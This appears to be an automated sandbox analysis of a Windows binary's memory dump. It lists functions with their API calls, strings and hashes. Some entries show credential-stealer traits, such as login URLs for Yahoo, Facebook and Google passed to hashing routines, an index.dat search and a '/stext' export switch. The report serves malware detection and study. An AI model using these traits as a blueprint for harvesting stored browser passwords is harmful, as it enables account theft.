Opcode Fuzzy Hash: 0c221e4a7068c4d6934d41343829b8b78c46c2a8619205bb2734fd8b0e3e91f3
Instruction Fuzzy Hash: 4DF0E2713047035BE7206BB99C45B9776E85F40715F10842EB126D16E2DBBCD9808BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00442D7A, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00442D84
??3@YAXPAX@Z.MSVCRT ref: 00442D94
??3@YAXPAX@Z.MSVCRT ref: 00442DA4
??3@YAXPAX@Z.MSVCRT ref: 00442DB4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 91284e8d292f34cc8389785a3eba88276cdd8f2cca5db5bcb264024c119ed55e
Instruction ID: 4d75bcbf83e2a718e0a773ad5cf6a383805f84e699810b963ae7674306c23c36
Opcode Fuzzy Hash: 91284e8d292f34cc8389785a3eba88276cdd8f2cca5db5bcb264024c119ed55e
Instruction Fuzzy Hash: 05E080A1705301777A105B36BE55B0313EC3A703423D8041FF40AC3255DEBCC840441C

Uniqueness

Uniqueness Score: -1.00%

Function 0043800C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0043804F
memset.MSVCRT ref: 004383F8

Strings

only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: only a single result allowed for a SELECT that is part of an expression
API String ID: 2221118986-1725073988
Opcode ID: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
Opcode Fuzzy Hash: fea911689c87fcb8dadeea6a797f322e67ae447bf2e03149324d6587d0a0c1b4
Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00409F53, Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00409F8D
??2@YAPAXI@Z.MSVCRT ref: 00409FAB
??2@YAPAXI@Z.MSVCRT ref: 00409FC9
??2@YAPAXI@Z.MSVCRT ref: 00409FE7

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
Instruction ID: 97910a1e78d05b4995072b8892bf30812772bdb2f497aa37043254e3fee4362a
Opcode Fuzzy Hash: 0567f08961b2cf397e8b5cffb80cfb7da57dcf973421e34affee400c22969a13
Instruction Fuzzy Hash: AB01DEB16523406FEB58DB39EE67B2A66949B58351F48453EF207C91F6EAB4C840CA08

Uniqueness

Uniqueness Score: -1.00%

Function 0041C702, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041C7B0

Strings

BINARY, xrefs: 0041C70E
5lA, xrefs: 0041C8A3

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: 5lA$BINARY
API String ID: 2221118986-2383938406
Opcode ID: dd24f9d92f81de63219fe002133dcf0594d08e64d53a6152104cdc368e2b671f
Instruction ID: bfb3245fc00688105b1f81726e77846e409aff0e69a2cb21cfce066b793b8303
Opcode Fuzzy Hash: dd24f9d92f81de63219fe002133dcf0594d08e64d53a6152104cdc368e2b671f
Instruction Fuzzy Hash: 52519C719443459FDB21DF68C8C1AEA7BE4AF08351F14446FE859CB381D778D980CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00414E1C, Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00414D9F: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD1
Part of subcall function 00414D9F: GetLastError.KERNEL32 ref: 00414DD7

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00414E4C
GetLastError.KERNEL32 ref: 00414E56

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
Instruction ID: 78f6fc62e556ae6391f2b7d02d7635eeebb8002b3cc976368f6d55ef40470767
Opcode Fuzzy Hash: 3b8e0b6f2cdf357378df206a5466dbf18c64a2966c614271076d748b4fcb6fba
Instruction Fuzzy Hash: 20016D36244305BBEB108F65EC45BEB7B6CFB95761F100427F908D6240E774ED908AE9

Uniqueness

Uniqueness Score: -1.00%

Function 00414D9F, Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00414DC0
GetLastError.KERNEL32 ref: 00414DD1
GetLastError.KERNEL32 ref: 00414DD7

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
Instruction ID: ce6d17c8e1bf95b997c08e1a60c9ed70337bd99ba9d8843779863386e1f48c80
Opcode Fuzzy Hash: 77788fb3081b482f24613af2ac918d7e659f5b9ca52062a4a7545bad1632a255
Instruction Fuzzy Hash: 16F03936A10119BBCF009F74EC019EA7BA8EB45760B104726E822E6690EB30EA409AD4

Uniqueness

Uniqueness Score: -1.00%

Function 004074C6, Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Temp$DirectoryFileNamePathWindows
String ID:
API String ID: 1125800050-0
Opcode ID: 2f355c031f751b6a1ddc2a2edf890b8f78de2746b7ef95e2a6202f652ec718e5
Instruction ID: d63233cf370321f654e877065783905421c71730e772143eb1ff94a20aa817f7
Opcode Fuzzy Hash: 2f355c031f751b6a1ddc2a2edf890b8f78de2746b7ef95e2a6202f652ec718e5
Instruction Fuzzy Hash: 4FE0927A900219A7DB205F60DC0DFC7B7BCEB41705F000170B945E2051EB34A7448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407475, Relevance: 3.8, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407491
memcpy.MSVCRT ref: 004074A9
free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: freemallocmemcpy
String ID:
API String ID: 3056473165-0
Opcode ID: a552214b4f396ffe3b978ec953857254dfa688d2005ab474b6786e0315961ce8
Instruction ID: e360d5709d2f3202c1ca25caae3d4aa805c65bf3858a1f44a91d23c9b12a71fe
Opcode Fuzzy Hash: a552214b4f396ffe3b978ec953857254dfa688d2005ab474b6786e0315961ce8
Instruction Fuzzy Hash: FFF0E972A082229FD708EB75A94180B779DAF44364710442FF404E3281D738AC40C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0044233C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,0040FF66,?,?,00403292,?), ref: 0044234D

Strings

Lh@, xrefs: 00442344

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID: Lh@
API String ID: 3664257935-1564020105
Opcode ID: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
Instruction ID: 76fd25b73cfe59c43d76c33e9e0e0ec1b0c89da13299cefcee144e01fa2b623b
Opcode Fuzzy Hash: 9d0562313ed05c1077c8e865d76b3287021ad506fa066eb96027120c77a5f393
Instruction Fuzzy Hash: 33E0F6B5900B008F93308F2BE944407FBF9BFE56113108E1FE4AAC2A24C3B4A6458F54

Uniqueness

Uniqueness Score: -1.00%

Function 00407B93, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA

Strings

5"D, xrefs: 00407BA1

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 5"D
API String ID: 2738559852-199376320
Opcode ID: ff886d5e1a4997402200634e3e0df398fd9a7f66ba8de1bb0dfe65b9a394ad27
Instruction ID: b1f5ca1499e8e2fa5163bdfa5e58581682f5a8fdc606d8935362a09f0a3b37d8
Opcode Fuzzy Hash: ff886d5e1a4997402200634e3e0df398fd9a7f66ba8de1bb0dfe65b9a394ad27
Instruction Fuzzy Hash: 46D0923501020DBBDF018F80DC06B997B6DEB0575AF108054BA0095060C7759A10AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004349F1, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

d, xrefs: 00434BB1

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 35a79dfe1d1e81fc7e2dd898582a66ecb02311c77e20593106318d1c42a7929a
Instruction ID: 01fd0a19dca965820be780cd5e1a180e940d32085fcd4292c33d665daa4a4ca3
Opcode Fuzzy Hash: 35a79dfe1d1e81fc7e2dd898582a66ecb02311c77e20593106318d1c42a7929a
Instruction Fuzzy Hash: B7819D716083519FCB10EF1AC84169FBBE0AFC8318F15592FF88497251D778EA85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5B3, Relevance: 3.1, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B

GetStdHandle.KERNEL32(000000F5,?,00000000,00000001,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040C5DC
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000), ref: 0040C6E9

Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F

Part of subcall function 004071BD: GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
Part of subcall function 004071BD: _snwprintf.MSVCRT ref: 004071FE
Part of subcall function 004071BD: MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
String ID:
API String ID: 1161345128-0
Opcode ID: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
Instruction ID: 8008e0f7e2c68a0a7dbf7afa260ddf7c08443fea941bd9d01fd0dc6d198c04cd
Opcode Fuzzy Hash: 437b4ee2f0eb5be7c77dedbcd6cde51050b7bc30ff96baad5e2726301dc593ae
Instruction Fuzzy Hash: 82415F31B00100EBCB359F69C8C9E5E76A5AF45710F215A2BF406A73D1CB7AAD80CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E227, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040E274

Strings

/stext, xrefs: 0040E26F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp
String ID: /stext
API String ID: 2081463915-3817206916
Opcode ID: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
Instruction ID: 5da650caeba3f583edd317abe6dc9e2273d49bc4fc560570e2d9775ed52fc578
Opcode Fuzzy Hash: e7410df3178ec06b149dd267b323e01f272d5e4eb36cc30877f85b29a899849a
Instruction Fuzzy Hash: 37218170B00105AFD704FFAA89C1A9DB7A9BF94304F1045BEE415F7382DB79AD218B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040946C, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

index.dat, xrefs: 004094CB

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$FileFindFirst
String ID: index.dat
API String ID: 1858513025-427268347
Opcode ID: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
Instruction ID: ea6e303a67c95597c7ba2300e155a691c3aaaa96276431a044c3ae834a976286
Opcode Fuzzy Hash: b5a9187b74a8ffb00ae391732f5c189a4998f68d39988537941cb2dcf05d029e
Instruction Fuzzy Hash: 8601527180526999EB20E662CD426DE727CAF00314F1041BBA858F21D2EB3CDF868F4D

Uniqueness

Uniqueness Score: -1.00%

Function 00412B2E, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00412B3D

Strings

failed to allocate %u bytes of memory, xrefs: 00412B57

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 5b5a248cf51c062ed88202fa4447692d12f7a24d46f4087129949bf54e3fefc0
Instruction ID: 83e647f58a001b4b33716092e1dc9084e7a57e1649cb419fd0ecfe0012ae2b1c
Opcode Fuzzy Hash: 5b5a248cf51c062ed88202fa4447692d12f7a24d46f4087129949bf54e3fefc0
Instruction Fuzzy Hash: B1E026B7F4561267C2004F1AEC019866790AFC032171A063BF92CD7380D678E9A683A9

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE6, Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00414DFF
FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,0045162C,00415453,00000008,00000000,00000000,?,00415610,?,00000000), ref: 00414E08

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID:
API String ID: 1821831730-0
Opcode ID: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
Instruction ID: a5fc701692feba82469beb2995ebf65a4cce15204005db1f3291e32cb0673270
Opcode Fuzzy Hash: bdd47c3b9fe514102062cbc93d8af5e804c2569a959601c5796dc848db78b9f9
Instruction Fuzzy Hash: 95E0CD372006155FD7005B7CDCC09D77399AF85734725032AF261C3190C665D4424664

Uniqueness

Uniqueness Score: -1.00%

Function 0041946A, Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041960E
memcmp.MSVCRT ref: 00419620

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
Instruction ID: 09c6ddd7a7fbafff04f5e46546a8ec227a467f18660dcb1fea67ae87f7adc2a4
Opcode Fuzzy Hash: 025fdd92005a470daeaaf52f40e6be84491494a20acb6a1a3520ba0441d5af98
Instruction Fuzzy Hash: EB6170B1E05205FFDB11EFA489A09EEB7B8AB04308F14806FE108E3241D7789ED5DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004098C2, Relevance: 2.6, APIs: 2, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F

wcslen.MSVCRT ref: 00409901
memset.MSVCRT ref: 00409980

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadmemsetwcslen
String ID:
API String ID: 1960736289-0
Opcode ID: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
Instruction ID: eeeebaecff14eb5a2c3d0f3031068d4b6d2ebef8e1bb4496a3092dc18c5c1f6a
Opcode Fuzzy Hash: 4e256b32b087a2d54a013736d5ec90ac317bbbafb522d715d277fbd7e177f48e
Instruction Fuzzy Hash: C0318172510249BBCF11EFA5CCC19EE77B9AF48304F14887EF505B7282D638AE499B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED6C, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EDFA: memset.MSVCRT ref: 0040EE42
Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE59
Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EE61
Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EEBC
Part of subcall function 0040EDFA: wcslen.MSVCRT ref: 0040EECA

Part of subcall function 0040797A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,0040EDAE,00000000,?,00000000,?,00000000), ref: 00407992
Part of subcall function 0040797A: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004079A6
Part of subcall function 0040797A: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004101ED), ref: 004079AF

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 0040EDB8

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$File$Time$CloseCompareCreateHandlememset
String ID:
API String ID: 4204647287-0
Opcode ID: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
Instruction ID: 7375e5b5c48a3cf746583bdb812c6cb833081a8f043ffb24ec2f547d3e817a13
Opcode Fuzzy Hash: eeb16535b7e8d9903344e6e4fc87394a79dd4b2724dffbbd49d7f28440978fac
Instruction Fuzzy Hash: 58114C72C00219ABCF11EBA5D9419DEBBB9EF44300F20047BE801F3280D634AF44CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00405149, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(0040511F,?,?,00000000,00000000,000000FF,0040571F,000000FF,000000FF,?,00000000,0040511F,?,?,?,0040566C), ref: 00405165

Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 8e3300ccc99ceaafd88bf63aedabe6f8cf4ec2b06029cc1f8c5137446a6ac1ce
Instruction ID: 13fe659266928e09ca291fdb8c13dcfe3ff2a23a31d494a2ddaccb8188200d23
Opcode Fuzzy Hash: 8e3300ccc99ceaafd88bf63aedabe6f8cf4ec2b06029cc1f8c5137446a6ac1ce
Instruction Fuzzy Hash: 5CE0C736100100FFE6208F08CC06F6BBBF9EBC4B00F10883EB2A49A0B1C2326812CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00411B36, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00411B5D

Part of subcall function 004119C6: memset.MSVCRT ref: 004119E5
Part of subcall function 004119C6: _itow.MSVCRT ref: 004119FC
Part of subcall function 004119C6: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00411A0B

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
Instruction ID: e4974885a9e011c02de9f8347c72c3dce1736aa6ad634daf2893e710d343c839
Opcode Fuzzy Hash: 4eb565fe38f19d9fcd3ef397b8be022b0e8b2ee90877df68a8cf7ef72faf0ee1
Instruction Fuzzy Hash: ABE0B672000149AFDF125F80EC01AA97BA6FF04315F248459FA5805631D73695B0EB95

Uniqueness

Uniqueness Score: -1.00%

Function 00411376, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 0041139E: LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
Part of subcall function 0041139E: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0041126B,00000104,0041126B,00000000,?), ref: 00411395

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$FileLibraryLoadModuleName
String ID:
API String ID: 3821362017-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 161ab63227dca0468342f2fd6fc01eeb5e2c53d4d8b5c6eb41d2cf02796b8335
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: B3D0A9312183196BE220AB708C00FABA3E86B40710F008C2ABAA0D68A8D264C8805354

Uniqueness

Uniqueness Score: -1.00%

Function 00407BB2, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040C605,00000000,00448B84,00000002,?,?,?,0040E2DC,00000000), ref: 00407BC9

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
Instruction ID: 7a92458e03063ade3ff171a8f73d1b131da45bdd434acd56d38c8090c64c1cda
Opcode Fuzzy Hash: d369bb92ad7c49a717be8c21899150b55a2c28b5f26bff8a5462d106715fcbd8
Instruction Fuzzy Hash: 47D0C93511020DFBDF01CF80DC06FDD7B7DEB04759F108054BA1495060D7B59B14AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407144, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
Instruction ID: 81d2dec17d2b84b4128be66cdd24e97b0dbf61b8fa3bcd6fd5fd384be9d73f32
Opcode Fuzzy Hash: 9a929023f2c627b70a1d779166e782d06c126c11e9800125383b8a94db93c5c6
Instruction Fuzzy Hash: E4C092B0240201BEFF228B10ED16F36695CD740B01F2044247E00E40E0D1A04F108924

Uniqueness

Uniqueness Score: -1.00%

Function 0040715D, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
Instruction ID: 6739adb68e03e12f7f7c1d8ccdc83ffe2e18cb8bef7d19e3acfe4a72d1b5eace
Opcode Fuzzy Hash: b3d4b136a85312aa723e3c9e2acb5816e1c60966b2ab5dba606afdc82e084c94
Instruction Fuzzy Hash: 49C092F02502017EFF208B10AD0AF37695DD780B01F2084207E00E40E0D2A14C008924

Uniqueness

Uniqueness Score: -1.00%

Function 00408604, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040860B

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 6d234507db9eff2efabc180c4569eab15715e06228adb937f803b04aca3214d4
Instruction ID: b86fd1081c12c971c14e25096d529e9df9055785cb1c99d48f6af2a57df14557
Opcode Fuzzy Hash: 6d234507db9eff2efabc180c4569eab15715e06228adb937f803b04aca3214d4
Instruction Fuzzy Hash: D3C09BB15127015BFB345E15D50571273E45F50727F354C1DB4D1D24C2DB7CD4408518

Uniqueness

Uniqueness Score: -1.00%

Function 004084DA, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,004083EE,?,00000000,00000000,?,00410708,?), ref: 004084E4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
Instruction ID: a26663696ee19f03613d77843e46d9f39b2dea1a9069363f3edb82d48ea13a69
Opcode Fuzzy Hash: ce138f875d3acdc4bfbe17b30e16d53cb8f2c6707e5d1d9850a648f01b786906
Instruction Fuzzy Hash: FFC092346205028BE23C5F38AD5A82A77E0BF4A3313B40F6CA0F3D20F0EB3884428A04

Uniqueness

Uniqueness Score: -1.00%

Function 004117E3, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0e5244a652f8a00c19ee35b2b6df8d293c0f8fc24debe18f1969453427d3ee92
Instruction ID: 28a9858cfff7e6e2b1914a1c804994c03dcb5394f8963e6e43683e707f81cfe3
